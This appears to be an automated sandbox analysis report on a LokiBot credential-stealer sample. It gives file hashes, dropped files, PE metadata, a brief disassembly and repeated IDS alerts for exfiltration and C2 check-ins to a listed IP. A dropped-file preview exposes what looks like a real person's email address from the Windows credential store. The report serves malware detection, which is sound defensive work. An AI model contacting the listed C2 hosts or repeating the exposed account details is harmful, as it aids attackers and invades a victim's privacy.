                                • 68.66.226.70
                                L9s7zh4pKD.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                qGwn1hxOmZ.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                gIT7daOBPt.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                f4gxrcTDkV.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                SOO6hKZ7M0.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                SOO6hKZ7M0.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                f4gxrcTDkV.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                BW5D0n506F.exeGet hashmaliciousBrowse
                                • 68.66.226.70

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612_dec
                                Process:C:\Windows\System32\lsass.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3656
                                Entropy (8bit):7.047605315526176
                                Encrypted:false
                                SSDEEP:96:tO8ab0MEOHAROl5X1TJi1FngApY2gpZhprCRF8hVos+cYO40:s8oVgROl5lTJAFApnp/xJL
                                MD5:0C791F9EFA54F4FFE2203D14A2401528
                                SHA1:C5EC56621DEC7C6BB9711123DD2DFDB22A9EED89
                                SHA-256:BEB9BF78BD08BBF91F090233587CD6A76FFC819EDF91D3A3099264B26986C6AE
                                SHA-512:DD62210C98A52BB391174F56ED49283D11CBB7F2E12ED9D6F69EDED303E40FA2FC32670EEBA11A23D6E5FBEF702172B8B105C114D4413C273AD55C609D98B71E
                                Malicious:false
                                Reputation:low
                                Preview: 0...H................ fq............................L.e.g.a.c.y.G.e.n.e.r.i.c.:.t.a.r.g.e.t.=.M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.s.h.a.h.a.k...s.h.a.p.i.r.a.@.o.u.t.l.o.o.k...c.o.m.......(...P.e.r.s.i.s.t.e.d.C.r.e.d.e.n.t.i.a.l.......6...s.h.a.h.a.k...s.h.a.p.i.r.a.@.o.u.t.l.o.o.k...c.o.m...........D...M.i.c.r.o.s.o.f.t._.W.i.n.d.o.w.s.L.i.v.e.:.a.u.t.h.s.t.a.t.e.:.0...................z..O.........q..~H.9.R.u.............f...... ....,...9J.&6$-.h..&...N..4!...Ka............. .....<.......>.....*.C.....C...- .....C)".6}........;+#....ty..CYZ.t......T..F....:X..v..2^.......J..tK...t...;..2.WD.V..$....o.bxN=......Id....D...M.i.c.r.o.s.o.f.t._.W.i.n.d.o.w.s.L.i.v.e.:.a.u.t.h.s.t.a.t.e.:.1.......kM.T.h...V^..k..u..U*.a.n0.P..;L...~.,.r~...Y.2h.....+3=..|ykXXm.u...!.QB...4.)!...u..X...[3t..%0....v}.w..%.g.9..q.*...C..0/.=..o..@...IN}...<..X..9.........J....h..J.<n)*...(...n.O...%.W.H.W...pn}=.D#..W...h\....D.. H....E<'..@.H..n.i9..^>.U.....D...M.i.c.r.o.s.o.
                                C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.hdb
                                Process:C:\Users\user\Desktop\2GirCpksIO.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):2.0
                                Encrypted:false
                                SSDEEP:3:Nn:Nn
                                MD5:9C3784B43620F067283A5B473E4FA839
                                SHA1:6A0856C8F5E5F495CE1EB4AFBBB97B2D75D7A0DE
                                SHA-256:554F626F83D6FCEA54BD064C60534D5DA4BD36CCAFD9581D7BCE16EA5D7CCDDB
                                SHA-512:D81091737B27F9490FC24BA4DC35DABB8999B5F94960AA098FAF0D2D9F6413CB457244D843DCD3D7664EE6D5D81966DA8B1D951BCF5D82DAE8C3D30EC92539C4
                                Malicious:false
                                Reputation:low
                                Preview: ....
                                C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck
                                Process:C:\Users\user\Desktop\2GirCpksIO.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb
                                Process:C:\Users\user\Desktop\2GirCpksIO.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):1.1262763721961973
                                Encrypted:false
                                SSDEEP:3:/lSllIEXln:AWE1
                                MD5:D69FB7CE74DAC48982B69816C3772E4E
                                SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
                                SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
                                SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: ........................................user.

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.550902828543532
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:2GirCpksIO.exe
                                File size:114688
                                MD5:5cc619f7dd365ec061f1f385d25bea30
                                SHA1:5b28cb97973da18953fb284648f13257f0aba2f3
                                SHA256:7f5124088c09a925ad3a162b4e56391557dfc7d9950b9a55044036698d369d13
                                SHA512:bc3f1c85c20d22c7124ed93987f49d32cbe21639d7078ff0cb11dc5f439342f9609ba78c92b097affd610ee878372e8673a12829ba16ee70b73c1470f1124cd7
                                SSDEEP:1536:SIQo1sxasghSzS9Qu2cRs/UVCNmETDFdnvr3Syjh3sMU+Wi04Mthlxxx:X51sxXiQu2cRss8mSFROyjh3s6W2u
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....5.a.....................@....................@................

                                File Icon

                                Icon Hash:20047c7c70f0e004

                                Static PE Info

                                General

                                Entrypoint:0x401398
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:
                                Time Stamp:0x619B35E8 [Mon Nov 22 06:17:12 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:6161f2da031dac68f8cae17819217d19

                                Entrypoint Preview

                                Instruction
                                push 0040144Ch
                                call 00007FDA78CDA2F3h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                inc eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add bh, bh
                                mov dl, 93h
                                int1
                                or eax, 9B479C46h
                                mov ah, 10h
                                dec esi
                                lds ebx, esp
                                loope 00007FDA78CDA29Bh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [eax], eax
                                add byte ptr [eax], al
                                add byte ptr [ebx], al
                                add dword ptr [eax], eax
                                add byte ptr [eax], al
                                inc esi
                                dec ecx
                                dec ebp
                                push ebx
                                inc ebp
                                inc esp
                                inc ebp
                                push ebx
                                add byte ptr [eax], cl
                                inc ecx
                                add al, dh
                                pop es
                                inc ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                add byte ptr [eax], al
                                add byte ptr [esi+40h], cl
                                add byte ptr [edi], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], bh
                                inc eax
                                add byte ptr [edi], al
                                add byte ptr [eax], al
                                add ah, dl
                                and byte ptr [eax+00h], al
                                pop es
                                add byte ptr [eax], al
                                add byte ptr [eax+40h], bh
                                add byte ptr [ecx], al
                                add byte ptr [edx], al
                                add byte ptr [eax+1Ch], ah
                                inc eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add bh, bh

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x187640x28.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b0000x1ede.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x148.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x17cac0x18000False0.631123860677data6.86127779315IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .data0x190000x11dc0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc0x1b0000x1ede0x2000False0.205200195312data4.84044222159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                450x1ca920x420ASCII text, with CRLF line terminatorsEnglishUnited States
                                CUSTOM0x1c6720x420ASCII text, with CRLF line terminatorsEnglishUnited States
                                CUSTOM0x1c2520x420ASCII text, with CRLF line terminatorsEnglishUnited States
                                CUSTOM0x1be160x43cASCII text, with CRLF line terminatorsEnglishUnited States
                                CUSTOM0x1ba940x382ASCII text, with CRLF line terminatorsEnglishUnited States
                                RT_ICON0x1b9640x130data
                                RT_ICON0x1b67c0x2e8data
                                RT_ICON0x1b5540x128GLS_BINARY_LSB_FIRST
                                RT_STRING0x1ceb20x2cdataEnglishUnited States
                                RT_GROUP_ICON0x1b5240x30data
                                RT_VERSION0x1b2d00x254data

                                Imports

                                DLLImport
                                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaR8Str, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                Version Infos

                                DescriptionData
                                Translation0x0000 0x04b0
                                InternalNameSORNER
                                FileVersion1.00
                                CompanyNameFireflies.ai
                                CommentsFireflies.ai
                                ProductNameFireflies.ai
                                ProductVersion1.00
                                OriginalFilenameSORNER.exe

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                11/22/21-15:29:00.949977TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14978880192.168.11.20192.185.217.246
                                11/22/21-15:29:00.949977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.11.20192.185.217.246
                                11/22/21-15:29:00.949977TCP2025381ET TROJAN LokiBot Checkin4978880192.168.11.20192.185.217.246
                                11/22/21-15:29:00.949977TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24978880192.168.11.20192.185.217.246
                                11/22/21-15:29:07.797027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.11.20192.185.217.246
                                11/22/21-15:29:07.797027TCP2025381ET TROJAN LokiBot Checkin4978980192.168.11.20192.185.217.246
                                11/22/21-15:29:08.696328TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.11.20192.185.217.246
                                11/22/21-15:29:08.696328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.11.20192.185.217.246
                                11/22/21-15:29:08.696328TCP2025381ET TROJAN LokiBot Checkin4979080192.168.11.20192.185.217.246
                                11/22/21-15:29:08.696328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.11.20192.185.217.246
                                11/22/21-15:29:09.708761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.11.20192.185.217.246
                                11/22/21-15:29:09.708761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.11.20192.185.217.246
                                11/22/21-15:29:09.708761TCP2025381ET TROJAN LokiBot Checkin4979180192.168.11.20192.185.217.246
                                11/22/21-15:29:09.708761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.11.20192.185.217.246
                                11/22/21-15:29:10.753878TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.11.20192.185.217.246
                                11/22/21-15:29:10.753878TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.11.20192.185.217.246
                                11/22/21-15:29:10.753878TCP2025381ET TROJAN LokiBot Checkin4979280192.168.11.20192.185.217.246
                                11/22/21-15:29:10.753878TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.11.20192.185.217.246
                                11/22/21-15:29:11.736717TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.11.20192.185.217.246
                                11/22/21-15:29:11.736717TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.11.20192.185.217.246
                                11/22/21-15:29:11.736717TCP2025381ET TROJAN LokiBot Checkin4979380192.168.11.20192.185.217.246
                                11/22/21-15:29:11.736717TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.11.20192.185.217.246
                                11/22/21-15:29:12.785936TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.11.20192.185.217.246
                                11/22/21-15:29:12.785936TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.11.20192.185.217.246
                                11/22/21-15:29:12.785936TCP2025381ET TROJAN LokiBot Checkin4979480192.168.11.20192.185.217.246
                                11/22/21-15:29:12.785936TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.11.20192.185.217.246
                                11/22/21-15:29:13.775518TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.11.20192.185.217.246
                                11/22/21-15:29:13.775518TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.11.20192.185.217.246
                                11/22/21-15:29:13.775518TCP2025381ET TROJAN LokiBot Checkin4979580192.168.11.20192.185.217.246
                                11/22/21-15:29:13.775518TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.11.20192.185.217.246
                                11/22/21-15:29:14.715714TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.11.20192.185.217.246
                                11/22/21-15:29:14.715714TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.11.20192.185.217.246
                                11/22/21-15:29:14.715714TCP2025381ET TROJAN LokiBot Checkin4979680192.168.11.20192.185.217.246
                                11/22/21-15:29:14.715714TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.11.20192.185.217.246
                                11/22/21-15:29:15.742524TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.11.20192.185.217.246
                                11/22/21-15:29:15.742524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.11.20192.185.217.246
                                11/22/21-15:29:15.742524TCP2025381ET TROJAN LokiBot Checkin4979780192.168.11.20192.185.217.246
                                11/22/21-15:29:15.742524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.11.20192.185.217.246
                                11/22/21-15:29:16.767344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.11.20192.185.217.246
                                11/22/21-15:29:16.767344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.11.20192.185.217.246
                                11/22/21-15:29:16.767344TCP2025381ET TROJAN LokiBot Checkin4979880192.168.11.20192.185.217.246
                                11/22/21-15:29:16.767344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.11.20192.185.217.246
                                11/22/21-15:29:17.727561TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.11.20192.185.217.246
                                11/22/21-15:29:17.727561TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.11.20192.185.217.246
                                11/22/21-15:29:17.727561TCP2025381ET TROJAN LokiBot Checkin4979980192.168.11.20192.185.217.246
                                11/22/21-15:29:17.727561TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.11.20192.185.217.246
                                11/22/21-15:29:18.707511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.11.20192.185.217.246
                                11/22/21-15:29:18.707511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.11.20192.185.217.246
                                11/22/21-15:29:18.707511TCP2025381ET TROJAN LokiBot Checkin4980080192.168.11.20192.185.217.246
                                11/22/21-15:29:18.707511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.11.20192.185.217.246
                                11/22/21-15:29:19.741161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.11.20192.185.217.246
                                11/22/21-15:29:19.741161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.11.20192.185.217.246
                                11/22/21-15:29:19.741161TCP2025381ET TROJAN LokiBot Checkin4980180192.168.11.20192.185.217.246
                                11/22/21-15:29:19.741161TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.11.20192.185.217.246
                                11/22/21-15:29:20.815321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.11.20192.185.217.246
                                11/22/21-15:29:20.815321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.11.20192.185.217.246
                                11/22/21-15:29:20.815321TCP2025381ET TROJAN LokiBot Checkin4980280192.168.11.20192.185.217.246
                                11/22/21-15:29:20.815321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.11.20192.185.217.246
                                11/22/21-15:29:21.862086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.11.20192.185.217.246
                                11/22/21-15:29:21.862086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.11.20192.185.217.246
                                11/22/21-15:29:21.862086TCP2025381ET TROJAN LokiBot Checkin4980380192.168.11.20192.185.217.246
                                11/22/21-15:29:21.862086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.11.20192.185.217.246
                                11/22/21-15:29:22.752104TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.11.20192.185.217.246
                                11/22/21-15:29:22.752104TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.11.20192.185.217.246
                                11/22/21-15:29:22.752104TCP2025381ET TROJAN LokiBot Checkin4980480192.168.11.20192.185.217.246
                                11/22/21-15:29:22.752104TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.11.20192.185.217.246
                                11/22/21-15:29:23.755166TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.11.20192.185.217.246
                                11/22/21-15:29:23.755166TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.11.20192.185.217.246
                                11/22/21-15:29:23.755166TCP2025381ET TROJAN LokiBot Checkin4980580192.168.11.20192.185.217.246
                                11/22/21-15:29:23.755166TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.11.20192.185.217.246
                                11/22/21-15:29:24.727798TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.11.20192.185.217.246
                                11/22/21-15:29:24.727798TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.11.20192.185.217.246
                                11/22/21-15:29:24.727798TCP2025381ET TROJAN LokiBot Checkin4980680192.168.11.20192.185.217.246
                                11/22/21-15:29:24.727798TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.11.20192.185.217.246
                                11/22/21-15:29:25.681198TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.11.20192.185.217.246
                                11/22/21-15:29:25.681198TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.11.20192.185.217.246
                                11/22/21-15:29:25.681198TCP2025381ET TROJAN LokiBot Checkin4980780192.168.11.20192.185.217.246
                                11/22/21-15:29:25.681198TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.11.20192.185.217.246
                                11/22/21-15:29:26.756023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.11.20192.185.217.246
                                11/22/21-15:29:26.756023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.11.20192.185.217.246
                                11/22/21-15:29:26.756023TCP2025381ET TROJAN LokiBot Checkin4980880192.168.11.20192.185.217.246
                                11/22/21-15:29:26.756023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.11.20192.185.217.246
                                11/22/21-15:29:27.791623TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.11.20192.185.217.246
                                11/22/21-15:29:27.791623TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.11.20192.185.217.246
                                11/22/21-15:29:27.791623TCP2025381ET TROJAN LokiBot Checkin4980980192.168.11.20192.185.217.246
                                11/22/21-15:29:27.791623TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.11.20192.185.217.246
                                11/22/21-15:29:28.696368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.11.20192.185.217.246
                                11/22/21-15:29:28.696368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.11.20192.185.217.246
                                11/22/21-15:29:28.696368TCP2025381ET TROJAN LokiBot Checkin4981080192.168.11.20192.185.217.246
                                11/22/21-15:29:28.696368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.11.20192.185.217.246
                                11/22/21-15:29:29.657840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.11.20192.185.217.246
                                11/22/21-15:29:29.657840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.11.20192.185.217.246
                                11/22/21-15:29:29.657840TCP2025381ET TROJAN LokiBot Checkin4981180192.168.11.20192.185.217.246
                                11/22/21-15:29:29.657840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.11.20192.185.217.246
                                11/22/21-15:29:30.622632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.11.20192.185.217.246
                                11/22/21-15:29:30.622632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.11.20192.185.217.246
                                11/22/21-15:29:30.622632TCP2025381ET TROJAN LokiBot Checkin4981280192.168.11.20192.185.217.246
                                11/22/21-15:29:30.622632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.11.20192.185.217.246
                                11/22/21-15:29:31.575960TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.11.20192.185.217.246
                                11/22/21-15:29:31.575960TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.11.20192.185.217.246
                                11/22/21-15:29:31.575960TCP2025381ET TROJAN LokiBot Checkin4981380192.168.11.20192.185.217.246
                                11/22/21-15:29:31.575960TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.11.20192.185.217.246
                                11/22/21-15:29:32.498086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.11.20192.185.217.246
                                11/22/21-15:29:32.498086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.11.20192.185.217.246
                                11/22/21-15:29:32.498086TCP2025381ET TROJAN LokiBot Checkin4981480192.168.11.20192.185.217.246
                                11/22/21-15:29:32.498086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.11.20192.185.217.246
                                11/22/21-15:29:33.425504TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.11.20192.185.217.246
                                11/22/21-15:29:33.425504TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.11.20192.185.217.246
                                11/22/21-15:29:33.425504TCP2025381ET TROJAN LokiBot Checkin4981580192.168.11.20192.185.217.246
                                11/22/21-15:29:33.425504TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.11.20192.185.217.246
                                11/22/21-15:29:34.289947TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.11.20192.185.217.246
                                11/22/21-15:29:34.289947TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.11.20192.185.217.246
                                11/22/21-15:29:34.289947TCP2025381ET TROJAN LokiBot Checkin4981680192.168.11.20192.185.217.246
                                11/22/21-15:29:34.289947TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.11.20192.185.217.246
                                11/22/21-15:29:35.268440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.11.20192.185.217.246
                                11/22/21-15:29:35.268440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.11.20192.185.217.246
                                11/22/21-15:29:35.268440TCP2025381ET TROJAN LokiBot Checkin4981780192.168.11.20192.185.217.246
                                11/22/21-15:29:35.268440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.11.20192.185.217.246
                                11/22/21-15:29:36.276251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.11.20192.185.217.246
                                11/22/21-15:29:36.276251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.11.20192.185.217.246
                                11/22/21-15:29:36.276251TCP2025381ET TROJAN LokiBot Checkin4981880192.168.11.20192.185.217.246
                                11/22/21-15:29:36.276251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.11.20192.185.217.246
                                11/22/21-15:29:37.248907TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.11.20192.185.217.246
                                11/22/21-15:29:37.248907TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.11.20192.185.217.246
                                11/22/21-15:29:37.248907TCP2025381ET TROJAN LokiBot Checkin4981980192.168.11.20192.185.217.246
                                11/22/21-15:29:37.248907TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.11.20192.185.217.246
                                11/22/21-15:29:38.193336TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.11.20192.185.217.246
                                11/22/21-15:29:38.193336TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.11.20192.185.217.246
                                11/22/21-15:29:38.193336TCP2025381ET TROJAN LokiBot Checkin4982080192.168.11.20192.185.217.246
                                11/22/21-15:29:38.193336TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.11.20192.185.217.246
                                11/22/21-15:29:39.121938TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.11.20192.185.217.246
